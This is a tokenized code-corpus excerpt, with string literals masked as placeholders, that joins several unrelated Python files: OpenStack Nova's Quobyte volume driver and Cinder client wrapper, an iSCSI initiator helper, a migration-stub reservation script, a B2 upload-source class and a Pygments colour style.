<EOL> volume , <EOL> mnt_base ) <EOL> utils . execute ( * command , check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:4> ] ) <EOL> LOG . info ( _LI ( '<STR_LIT>' ) , volume ) <EOL> def umount_volume ( mnt_base ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> utils . execute ( '<STR_LIT>' , mnt_base ) <EOL> except processutils . ProcessExecutionError as exc : <EOL> if '<STR_LIT>' in six . text_type ( exc ) : <EOL> LOG . error ( _LE ( "<STR_LIT>" ) , <EOL> mnt_base ) <EOL> else : <EOL> LOG . 
exception ( _LE ( "<STR_LIT>" ) , <EOL> mnt_base ) <EOL> def validate_volume ( mnt_base ) : <EOL> """<STR_LIT>""" <EOL> command = [ '<STR_LIT>' , "<STR_LIT>" , "<STR_LIT>" , mnt_base ] <EOL> try : <EOL> utils . execute ( * command ) <EOL> except processutils . ProcessExecutionError as exc : <EOL> msg = ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> % { '<STR_LIT>' : mnt_base , '<STR_LIT>' : exc } ) <EOL> raise nova_exception . NovaException ( msg ) <EOL> if not os . access ( mnt_base , os . W_OK | os . X_OK ) : <EOL> msg = ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % mnt_base ) <EOL> raise nova_exception . NovaException ( msg ) <EOL> class LibvirtQuobyteVolumeDriver ( fs . LibvirtBaseFileSystemVolumeDriver ) : <EOL> """<STR_LIT>""" <EOL> def _get_mount_point_base ( self ) : <EOL> return CONF . libvirt . quobyte_mount_point_base <EOL> def get_config ( self , connection_info , disk_info ) : <EOL> conf = super ( LibvirtQuobyteVolumeDriver , <EOL> self ) . get_config ( connection_info , disk_info ) <EOL> data = connection_info [ '<STR_LIT:data>' ] <EOL> conf . source_protocol = SOURCE_PROTOCOL <EOL> conf . source_type = SOURCE_TYPE <EOL> conf . driver_cache = DRIVER_CACHE <EOL> conf . driver_io = DRIVER_IO <EOL> conf . driver_format = data . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> conf . source_path = self . _get_device_path ( connection_info ) <EOL> return conf <EOL> @ utils . synchronized ( '<STR_LIT>' ) <EOL> def connect_volume ( self , connection_info , disk_info ) : <EOL> """<STR_LIT>""" <EOL> data = connection_info [ '<STR_LIT:data>' ] <EOL> quobyte_volume = self . _normalize_export ( data [ '<STR_LIT>' ] ) <EOL> mount_path = self . _get_mount_path ( connection_info ) <EOL> mounted = libvirt_utils . is_mounted ( mount_path , <EOL> SOURCE_PROTOCOL <EOL> + '<STR_LIT:@>' + quobyte_volume ) <EOL> if mounted : <EOL> try : <EOL> os . stat ( mount_path ) <EOL> except OSError as exc : <EOL> if exc . errno == errno . ENOTCONN : <EOL> mounted = False <EOL> LOG . 
info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , mount_path ) <EOL> umount_volume ( mount_path ) <EOL> if not mounted : <EOL> mount_volume ( quobyte_volume , <EOL> mount_path , <EOL> CONF . libvirt . quobyte_client_cfg ) <EOL> validate_volume ( mount_path ) <EOL> @ utils . synchronized ( '<STR_LIT>' ) <EOL> def disconnect_volume ( self , connection_info , disk_dev ) : <EOL> """<STR_LIT>""" <EOL> quobyte_volume = self . _normalize_export ( <EOL> connection_info [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] ) <EOL> mount_path = self . _get_mount_path ( connection_info ) <EOL> if libvirt_utils . is_mounted ( mount_path , '<STR_LIT>' + quobyte_volume ) : <EOL> umount_volume ( mount_path ) <EOL> else : <EOL> LOG . info ( _LI ( "<STR_LIT>" ) , <EOL> mount_path ) <EOL> def _normalize_export ( self , export ) : <EOL> protocol = SOURCE_PROTOCOL + "<STR_LIT>" <EOL> if export . startswith ( protocol ) : <EOL> export = export [ len ( protocol ) : ] <EOL> return export </s>
<s> """<STR_LIT>""" <EOL> from os_brick . initiator import connector <EOL> from oslo_concurrency import processutils as putils <EOL> from nova import utils <EOL> def get_iscsi_initiator ( execute = None ) : <EOL> """<STR_LIT>""" <EOL> root_helper = utils . get_root_helper ( ) <EOL> if not execute : <EOL> execute = putils . execute <EOL> iscsi = connector . ISCSIConnector ( root_helper = root_helper , <EOL> execute = execute ) <EOL> return iscsi . get_initiator ( ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import copy <EOL> import functools <EOL> import sys <EOL> from cinderclient import client as cinder_client <EOL> from cinderclient import exceptions as cinder_exception <EOL> from cinderclient . v1 import client as v1_client <EOL> from keystoneauth1 import exceptions as keystone_exception <EOL> from keystoneauth1 import loading as ks_loading <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_utils import excutils <EOL> from oslo_utils import strutils <EOL> import six <EOL> from nova import availability_zones as az <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova . i18n import _LE <EOL> from nova . i18n import _LW <EOL> cinder_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . IntOpt ( '<STR_LIT>' , <EOL> default = <NUM_LIT:3> , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = True , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CINDER_OPT_GROUP = '<STR_LIT>' <EOL> CONF . register_opts ( cinder_opts , group = CINDER_OPT_GROUP ) <EOL> deprecated = { '<STR_LIT>' : [ cfg . DeprecatedOpt ( '<STR_LIT>' , <EOL> group = CINDER_OPT_GROUP ) ] , <EOL> '<STR_LIT>' : [ cfg . DeprecatedOpt ( '<STR_LIT>' , <EOL> group = CINDER_OPT_GROUP ) ] , <EOL> '<STR_LIT>' : [ cfg . DeprecatedOpt ( '<STR_LIT>' , <EOL> group = CINDER_OPT_GROUP ) ] } <EOL> ks_loading . 
register_session_conf_options ( CONF , <EOL> CINDER_OPT_GROUP , <EOL> deprecated_opts = deprecated ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> _SESSION = None <EOL> _V1_ERROR_RAISED = False <EOL> def reset_globals ( ) : <EOL> """<STR_LIT>""" <EOL> global _SESSION <EOL> _SESSION = None <EOL> def cinderclient ( context ) : <EOL> global _SESSION <EOL> global _V1_ERROR_RAISED <EOL> if not _SESSION : <EOL> _SESSION = ks_loading . load_session_from_conf_options ( CONF , <EOL> CINDER_OPT_GROUP ) <EOL> url = None <EOL> endpoint_override = None <EOL> auth = context . get_auth_plugin ( ) <EOL> service_type , service_name , interface = CONF . cinder . catalog_info . split ( '<STR_LIT::>' ) <EOL> service_parameters = { '<STR_LIT>' : service_type , <EOL> '<STR_LIT>' : service_name , <EOL> '<STR_LIT>' : interface , <EOL> '<STR_LIT>' : CONF . cinder . os_region_name } <EOL> if CONF . cinder . endpoint_template : <EOL> url = CONF . cinder . endpoint_template % context . to_dict ( ) <EOL> endpoint_override = url <EOL> else : <EOL> url = _SESSION . get_endpoint ( auth , ** service_parameters ) <EOL> version = cinder_client . get_volume_api_from_url ( url ) <EOL> if version == '<STR_LIT:1>' and not _V1_ERROR_RAISED : <EOL> msg = _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> LOG . warning ( msg ) <EOL> _V1_ERROR_RAISED = True <EOL> return cinder_client . Client ( version , <EOL> session = _SESSION , <EOL> auth = auth , <EOL> endpoint_override = endpoint_override , <EOL> connect_retries = CONF . cinder . http_retries , <EOL> ** service_parameters ) <EOL> def _untranslate_volume_summary_view ( context , vol ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> d [ '<STR_LIT:id>' ] = vol . id <EOL> d [ '<STR_LIT:status>' ] = vol . status <EOL> d [ '<STR_LIT:size>' ] = vol . size <EOL> d [ '<STR_LIT>' ] = vol . availability_zone <EOL> d [ '<STR_LIT>' ] = vol . 
created_at <EOL> d [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> d [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> d [ '<STR_LIT>' ] = getattr ( vol , '<STR_LIT>' , False ) <EOL> if vol . attachments : <EOL> d [ '<STR_LIT>' ] = collections . OrderedDict ( ) <EOL> for attachment in vol . attachments : <EOL> a = { attachment [ '<STR_LIT>' ] : <EOL> { '<STR_LIT>' : attachment . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : attachment . get ( '<STR_LIT>' ) } <EOL> } <EOL> d [ '<STR_LIT>' ] . update ( a . items ( ) ) <EOL> d [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> d [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if hasattr ( vol , '<STR_LIT>' ) : <EOL> d [ '<STR_LIT>' ] = vol . display_name <EOL> d [ '<STR_LIT>' ] = vol . display_description <EOL> else : <EOL> d [ '<STR_LIT>' ] = vol . name <EOL> d [ '<STR_LIT>' ] = vol . description <EOL> d [ '<STR_LIT>' ] = vol . volume_type <EOL> d [ '<STR_LIT>' ] = vol . snapshot_id <EOL> d [ '<STR_LIT>' ] = strutils . bool_from_string ( vol . bootable ) <EOL> d [ '<STR_LIT>' ] = { } <EOL> for key , value in vol . metadata . items ( ) : <EOL> d [ '<STR_LIT>' ] [ key ] = value <EOL> if hasattr ( vol , '<STR_LIT>' ) : <EOL> d [ '<STR_LIT>' ] = copy . deepcopy ( vol . volume_image_metadata ) <EOL> return d <EOL> def _untranslate_snapshot_summary_view ( context , snapshot ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> d [ '<STR_LIT:id>' ] = snapshot . id <EOL> d [ '<STR_LIT:status>' ] = snapshot . status <EOL> d [ '<STR_LIT>' ] = snapshot . progress <EOL> d [ '<STR_LIT:size>' ] = snapshot . size <EOL> d [ '<STR_LIT>' ] = snapshot . created_at <EOL> if hasattr ( snapshot , '<STR_LIT>' ) : <EOL> d [ '<STR_LIT>' ] = snapshot . display_name <EOL> d [ '<STR_LIT>' ] = snapshot . display_description <EOL> else : <EOL> d [ '<STR_LIT>' ] = snapshot . name <EOL> d [ '<STR_LIT>' ] = snapshot . description <EOL> d [ '<STR_LIT>' ] = snapshot . volume_id <EOL> d [ '<STR_LIT>' ] = snapshot . project_id <EOL> d [ '<STR_LIT>' ] = snapshot . 
size <EOL> return d <EOL> def translate_cinder_exception ( method ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( method ) <EOL> def wrapper ( self , ctx , * args , ** kwargs ) : <EOL> try : <EOL> res = method ( self , ctx , * args , ** kwargs ) <EOL> except ( cinder_exception . ConnectionError , <EOL> keystone_exception . ConnectionError ) : <EOL> exc_type , exc_value , exc_trace = sys . exc_info ( ) <EOL> exc_value = exception . CinderConnectionFailed ( <EOL> reason = six . text_type ( exc_value ) ) <EOL> six . reraise ( exc_value , None , exc_trace ) <EOL> except ( keystone_exception . BadRequest , <EOL> cinder_exception . BadRequest ) : <EOL> exc_type , exc_value , exc_trace = sys . exc_info ( ) <EOL> exc_value = exception . InvalidInput ( <EOL> reason = six . text_type ( exc_value ) ) <EOL> six . reraise ( exc_value , None , exc_trace ) <EOL> except ( keystone_exception . Forbidden , <EOL> cinder_exception . Forbidden ) : <EOL> exc_type , exc_value , exc_trace = sys . exc_info ( ) <EOL> exc_value = exception . Forbidden ( message = six . text_type ( exc_value ) ) <EOL> six . reraise ( exc_value , None , exc_trace ) <EOL> return res <EOL> return wrapper <EOL> def translate_volume_exception ( method ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( self , ctx , volume_id , * args , ** kwargs ) : <EOL> try : <EOL> res = method ( self , ctx , volume_id , * args , ** kwargs ) <EOL> except ( cinder_exception . ClientException , <EOL> keystone_exception . ClientException ) : <EOL> exc_type , exc_value , exc_trace = sys . exc_info ( ) <EOL> if isinstance ( exc_value , ( keystone_exception . NotFound , <EOL> cinder_exception . NotFound ) ) : <EOL> exc_value = exception . VolumeNotFound ( volume_id = volume_id ) <EOL> six . 
reraise ( exc_value , None , exc_trace ) <EOL> return res <EOL> return translate_cinder_exception ( wrapper ) <EOL> def translate_snapshot_exception ( method ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( self , ctx , snapshot_id , * args , ** kwargs ) : <EOL> try : <EOL> res = method ( self , ctx , snapshot_id , * args , ** kwargs ) <EOL> except ( cinder_exception . ClientException , <EOL> keystone_exception . ClientException ) : <EOL> exc_type , exc_value , exc_trace = sys . exc_info ( ) <EOL> if isinstance ( exc_value , ( keystone_exception . NotFound , <EOL> cinder_exception . NotFound ) ) : <EOL> exc_value = exception . SnapshotNotFound ( snapshot_id = snapshot_id ) <EOL> six . reraise ( exc_value , None , exc_trace ) <EOL> return res <EOL> return translate_cinder_exception ( wrapper ) <EOL> class API ( object ) : <EOL> """<STR_LIT>""" <EOL> @ translate_volume_exception <EOL> def get ( self , context , volume_id ) : <EOL> item = cinderclient ( context ) . volumes . get ( volume_id ) <EOL> return _untranslate_volume_summary_view ( context , item ) <EOL> @ translate_cinder_exception <EOL> def get_all ( self , context , search_opts = None ) : <EOL> search_opts = search_opts or { } <EOL> items = cinderclient ( context ) . volumes . list ( detailed = True , <EOL> search_opts = search_opts ) <EOL> rval = [ ] <EOL> for item in items : <EOL> rval . append ( _untranslate_volume_summary_view ( context , item ) ) <EOL> return rval <EOL> def check_attached ( self , context , volume ) : <EOL> if volume [ '<STR_LIT:status>' ] != "<STR_LIT>" : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % { "<STR_LIT>" : volume [ '<STR_LIT:id>' ] , <EOL> "<STR_LIT:status>" : volume [ '<STR_LIT:status>' ] } <EOL> raise exception . 
InvalidVolume ( reason = msg ) <EOL> def check_attach ( self , context , volume , instance = None ) : <EOL> if volume [ '<STR_LIT:status>' ] != "<STR_LIT>" : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % { '<STR_LIT>' : volume [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT:status>' : volume [ '<STR_LIT:status>' ] } <EOL> raise exception . InvalidVolume ( reason = msg ) <EOL> if volume [ '<STR_LIT>' ] == "<STR_LIT>" : <EOL> msg = _ ( "<STR_LIT>" ) % volume [ '<STR_LIT:id>' ] <EOL> raise exception . InvalidVolume ( reason = msg ) <EOL> if instance and not CONF . cinder . cross_az_attach : <EOL> instance_az = az . get_instance_availability_zone ( context , instance ) <EOL> if instance_az != volume [ '<STR_LIT>' ] : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % { <EOL> "<STR_LIT>" : instance [ '<STR_LIT:id>' ] , <EOL> "<STR_LIT>" : volume [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : instance_az , <EOL> '<STR_LIT>' : volume [ '<STR_LIT>' ] } <EOL> raise exception . InvalidVolume ( reason = msg ) <EOL> def check_detach ( self , context , volume , instance = None ) : <EOL> if volume [ '<STR_LIT:status>' ] == "<STR_LIT>" : <EOL> msg = _ ( "<STR_LIT>" ) % volume [ '<STR_LIT:id>' ] <EOL> raise exception . InvalidVolume ( reason = msg ) <EOL> if volume [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exception . InvalidVolume ( reason = msg ) <EOL> if instance is not None and instance . uuid not in volume [ '<STR_LIT>' ] : <EOL> raise exception . VolumeUnattached ( volume_id = volume [ '<STR_LIT:id>' ] ) <EOL> @ translate_volume_exception <EOL> def reserve_volume ( self , context , volume_id ) : <EOL> cinderclient ( context ) . volumes . reserve ( volume_id ) <EOL> @ translate_volume_exception <EOL> def unreserve_volume ( self , context , volume_id ) : <EOL> cinderclient ( context ) . volumes . 
unreserve ( volume_id ) <EOL> @ translate_volume_exception <EOL> def begin_detaching ( self , context , volume_id ) : <EOL> cinderclient ( context ) . volumes . begin_detaching ( volume_id ) <EOL> @ translate_volume_exception <EOL> def roll_detaching ( self , context , volume_id ) : <EOL> cinderclient ( context ) . volumes . roll_detaching ( volume_id ) <EOL> @ translate_volume_exception <EOL> def attach ( self , context , volume_id , instance_uuid , mountpoint , mode = '<STR_LIT>' ) : <EOL> cinderclient ( context ) . volumes . attach ( volume_id , instance_uuid , <EOL> mountpoint , mode = mode ) <EOL> @ translate_volume_exception <EOL> def detach ( self , context , volume_id , instance_uuid = None , <EOL> attachment_id = None ) : <EOL> if attachment_id is None : <EOL> volume = self . get ( context , volume_id ) <EOL> if volume [ '<STR_LIT>' ] : <EOL> attachments = volume . get ( '<STR_LIT>' , { } ) <EOL> if instance_uuid : <EOL> attachment_id = attachments . get ( instance_uuid , { } ) . get ( '<STR_LIT>' ) <EOL> if not attachment_id : <EOL> LOG . warning ( _LW ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : volume_id , <EOL> '<STR_LIT>' : instance_uuid } ) <EOL> else : <EOL> LOG . warning ( _LW ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : volume_id } ) <EOL> cinderclient ( context ) . volumes . detach ( volume_id , attachment_id ) <EOL> @ translate_volume_exception <EOL> def initialize_connection ( self , context , volume_id , connector ) : <EOL> try : <EOL> connection_info = cinderclient ( <EOL> context ) . volumes . initialize_connection ( volume_id , connector ) <EOL> connection_info [ '<STR_LIT>' ] = connector <EOL> return connection_info <EOL> except cinder_exception . ClientException as ex : <EOL> with excutils . save_and_reraise_exception ( ) : <EOL> LOG . 
error ( _LE ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : volume_id , <EOL> '<STR_LIT:host>' : connector . get ( '<STR_LIT:host>' ) , <EOL> '<STR_LIT>' : six . text_type ( ex ) , <EOL> '<STR_LIT:code>' : ex . code } ) <EOL> try : <EOL> self . terminate_connection ( context , volume_id , connector ) <EOL> except Exception as exc : <EOL> LOG . error ( _LE ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : volume_id , <EOL> '<STR_LIT:host>' : connector . get ( '<STR_LIT:host>' ) , <EOL> '<STR_LIT>' : six . text_type ( exc ) , <EOL> '<STR_LIT:code>' : exc . code } ) <EOL> @ translate_volume_exception <EOL> def terminate_connection ( self , context , volume_id , connector ) : <EOL> return cinderclient ( context ) . volumes . terminate_connection ( volume_id , <EOL> connector ) <EOL> @ translate_cinder_exception <EOL> def migrate_volume_completion ( self , context , old_volume_id , new_volume_id , <EOL> error = False ) : <EOL> return cinderclient ( context ) . volumes . migrate_volume_completion ( <EOL> old_volume_id , new_volume_id , error ) <EOL> @ translate_cinder_exception <EOL> def create ( self , context , size , name , description , snapshot = None , <EOL> image_id = None , volume_type = None , metadata = None , <EOL> availability_zone = None ) : <EOL> client = cinderclient ( context ) <EOL> if snapshot is not None : <EOL> snapshot_id = snapshot [ '<STR_LIT:id>' ] <EOL> else : <EOL> snapshot_id = None <EOL> kwargs = dict ( snapshot_id = snapshot_id , <EOL> volume_type = volume_type , <EOL> user_id = context . user_id , <EOL> project_id = context . project_id , <EOL> availability_zone = availability_zone , <EOL> metadata = metadata , <EOL> imageRef = image_id ) <EOL> if isinstance ( client , v1_client . 
Client ) : <EOL> kwargs [ '<STR_LIT>' ] = name <EOL> kwargs [ '<STR_LIT>' ] = description <EOL> else : <EOL> kwargs [ '<STR_LIT:name>' ] = name <EOL> kwargs [ '<STR_LIT:description>' ] = description <EOL> try : <EOL> item = client . volumes . create ( size , ** kwargs ) <EOL> return _untranslate_volume_summary_view ( context , item ) <EOL> except cinder_exception . OverLimit : <EOL> raise exception . OverQuota ( overs = '<STR_LIT>' ) <EOL> @ translate_volume_exception <EOL> def delete ( self , context , volume_id ) : <EOL> cinderclient ( context ) . volumes . delete ( volume_id ) <EOL> @ translate_volume_exception <EOL> def update ( self , context , volume_id , fields ) : <EOL> raise NotImplementedError ( ) <EOL> @ translate_snapshot_exception <EOL> def get_snapshot ( self , context , snapshot_id ) : <EOL> item = cinderclient ( context ) . volume_snapshots . get ( snapshot_id ) <EOL> return _untranslate_snapshot_summary_view ( context , item ) <EOL> @ translate_cinder_exception <EOL> def get_all_snapshots ( self , context ) : <EOL> items = cinderclient ( context ) . volume_snapshots . list ( detailed = True ) <EOL> rvals = [ ] <EOL> for item in items : <EOL> rvals . append ( _untranslate_snapshot_summary_view ( context , item ) ) <EOL> return rvals <EOL> @ translate_volume_exception <EOL> def create_snapshot ( self , context , volume_id , name , description ) : <EOL> item = cinderclient ( context ) . volume_snapshots . create ( volume_id , <EOL> False , <EOL> name , <EOL> description ) <EOL> return _untranslate_snapshot_summary_view ( context , item ) <EOL> @ translate_volume_exception <EOL> def create_snapshot_force ( self , context , volume_id , name , description ) : <EOL> item = cinderclient ( context ) . volume_snapshots . 
create ( volume_id , <EOL> True , <EOL> name , <EOL> description ) <EOL> return _untranslate_snapshot_summary_view ( context , item ) <EOL> @ translate_snapshot_exception <EOL> def delete_snapshot ( self , context , snapshot_id ) : <EOL> cinderclient ( context ) . volume_snapshots . delete ( snapshot_id ) <EOL> @ translate_cinder_exception <EOL> def get_volume_encryption_metadata ( self , context , volume_id ) : <EOL> return cinderclient ( context ) . volumes . get_encryption_metadata ( volume_id ) <EOL> @ translate_snapshot_exception <EOL> def update_snapshot_status ( self , context , snapshot_id , status ) : <EOL> vs = cinderclient ( context ) . volume_snapshots <EOL> vs . update_snapshot_status ( <EOL> snapshot_id , <EOL> { '<STR_LIT:status>' : status , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> ) </s>
<s> import argparse <EOL> import glob <EOL> import os <EOL> import subprocess <EOL> BASE = '<STR_LIT>' . split ( '<STR_LIT:/>' ) <EOL> API_BASE = '<STR_LIT>' . split ( '<STR_LIT:/>' ) <EOL> STUB = """<STR_LIT>""" <EOL> def get_last_migration ( base ) : <EOL> path = os . path . join ( * tuple ( base + [ '<STR_LIT>' ] ) ) <EOL> migrations = sorted ( [ os . path . split ( fn ) [ - <NUM_LIT:1> ] for fn in glob . glob ( path ) ] ) <EOL> return int ( migrations [ - <NUM_LIT:1> ] . split ( '<STR_LIT:_>' ) [ <NUM_LIT:0> ] ) <EOL> def reserve_migrations ( base , number , git_add ) : <EOL> last = get_last_migration ( base ) <EOL> for i in range ( last + <NUM_LIT:1> , last + number + <NUM_LIT:1> ) : <EOL> name = '<STR_LIT>' % i <EOL> path = os . path . join ( * tuple ( base + [ name ] ) ) <EOL> with open ( path , '<STR_LIT:w>' ) as f : <EOL> f . write ( STUB ) <EOL> print ( '<STR_LIT>' % path ) <EOL> if git_add : <EOL> subprocess . call ( '<STR_LIT>' % path , shell = True ) <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , default = <NUM_LIT:10> , <EOL> type = int , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT>' , <EOL> const = True , default = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT>' , <EOL> const = True , default = False , <EOL> help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> if args . api : <EOL> base = API_BASE <EOL> else : <EOL> base = BASE <EOL> reserve_migrations ( base , args . number , args . git_add ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import hashlib <EOL> import os <EOL> from abc import ( ABCMeta , abstractmethod ) <EOL> import six <EOL> from . utils import ( BytesIoContextManager , hex_sha1_of_stream ) <EOL> @ six . add_metaclass ( ABCMeta ) <EOL> class AbstractUploadSource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def get_content_length ( self ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def get_content_sha1 ( self ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def open ( self ) : <EOL> """<STR_LIT>""" <EOL> class UploadSourceBytes ( AbstractUploadSource ) : <EOL> def __init__ ( self , data_bytes ) : <EOL> self . data_bytes = data_bytes <EOL> def get_content_length ( self ) : <EOL> return len ( self . data_bytes ) <EOL> def get_content_sha1 ( self ) : <EOL> return hashlib . sha1 ( self . data_bytes ) . hexdigest ( ) <EOL> def open ( self ) : <EOL> return BytesIoContextManager ( self . data_bytes ) <EOL> class UploadSourceLocalFile ( AbstractUploadSource ) : <EOL> def __init__ ( self , local_path , content_sha1 = None ) : <EOL> self . local_path = local_path <EOL> self . content_length = os . path . getsize ( local_path ) <EOL> self . content_sha1 = content_sha1 <EOL> def get_content_length ( self ) : <EOL> return self . content_length <EOL> def get_content_sha1 ( self ) : <EOL> if self . content_sha1 is None : <EOL> self . content_sha1 = self . _hex_sha1_of_file ( self . local_path ) <EOL> return self . content_sha1 <EOL> def open ( self ) : <EOL> return open ( self . local_path , '<STR_LIT:rb>' ) <EOL> def _hex_sha1_of_file ( self , local_path ) : <EOL> with open ( local_path , '<STR_LIT:rb>' ) as f : <EOL> return hex_sha1_of_stream ( f , self . content_length ) </s>
<s> from pygments . style import Style <EOL> from pygments . token import Keyword , Name , Comment , String , Error , Number , Operator , Generic , Whitespace , Punctuation , Other , Literal <EOL> class KayleeStyle ( Style ) : <EOL> background_color = "<STR_LIT>" <EOL> default_style = "<STR_LIT>" <EOL> styles = { <EOL> Whitespace : "<STR_LIT>" , <EOL> Error : "<STR_LIT>" , <EOL> Other : "<STR_LIT>" , <EOL> Comment : "<STR_LIT>" , <EOL> Comment . Preproc : "<STR_LIT>" , <EOL> Keyword : "<STR_LIT>" , <EOL> Keyword . Constant : "<STR_LIT>" , <EOL> Keyword . Declaration : "<STR_LIT>" , <EOL> Keyword . Namespace : "<STR_LIT>" , <EOL> Keyword . Pseudo : "<STR_LIT>" , <EOL> Keyword . Reserved : "<STR_LIT>" , <EOL> Keyword . Type : "<STR_LIT>" , <EOL> Operator : "<STR_LIT>" , <EOL> Operator . Word : "<STR_LIT>" , <EOL> Punctuation : "<STR_LIT>" , <EOL> Name : "<STR_LIT>" , <EOL> Name . Attribute : "<STR_LIT>" , <EOL> Name . Builtin : "<STR_LIT>" , <EOL> Name . Builtin . Pseudo : "<STR_LIT>" , <EOL> Name . Class : "<STR_LIT>" , <EOL> Name . Constant : "<STR_LIT>" , <EOL> Name . Decorator : "<STR_LIT>" , <EOL> Name . Entity : "<STR_LIT>" , <EOL> Name . Exception : "<STR_LIT>" , <EOL> Name . Function : "<STR_LIT>" , <EOL> Name . Property : "<STR_LIT>" , <EOL> Name . Label : "<STR_LIT>" , <EOL> Name . Namespace : "<STR_LIT>" , <EOL> Name . Other : "<STR_LIT>" , <EOL> Name . Tag : "<STR_LIT>" , <EOL> Name . Variable : "<STR_LIT>" , <EOL> Name . Variable . Class : "<STR_LIT>" , <EOL> Name . Variable . Global : "<STR_LIT>" , <EOL> Name . Variable . Instance : "<STR_LIT>" , <EOL> Number : "<STR_LIT>" , <EOL> Literal : "<STR_LIT>" , <EOL> Literal . Date : "<STR_LIT>" , <EOL> String : "<STR_LIT>" , <EOL> String . Backtick : "<STR_LIT>" , <EOL> String . Char : "<STR_LIT>" , <EOL> String . Doc : "<STR_LIT>" , <EOL> String . Double : "<STR_LIT>" , <EOL> String . Escape : "<STR_LIT>" , <EOL> String . Heredoc : "<STR_LIT>" , <EOL> String . Interpol : "<STR_LIT>" , <EOL> String . 
Other : "<STR_LIT>" , <EOL> String . Regex : "<STR_LIT>" , <EOL> String . Single : "<STR_LIT>" , <EOL> String . Symbol : "<STR_LIT>" , <EOL> Generic : "<STR_LIT>" , <EOL> Generic . Deleted : "<STR_LIT>" , <EOL> Generic . Emph : "<STR_LIT>" , <EOL> Generic . Error : "<STR_LIT>" , <EOL> Generic . Heading : "<STR_LIT>" , <EOL> Generic . Inserted : "<STR_LIT>" , <EOL> Generic . Output : "<STR_LIT>" , <EOL> Generic . Prompt : "<STR_LIT>" , <EOL> Generic . Strong : "<STR_LIT>" , <EOL> Generic . Subheading : "<STR_LIT>" , <EOL> Generic . Traceback : "<STR_LIT>" , <EOL> } </s>
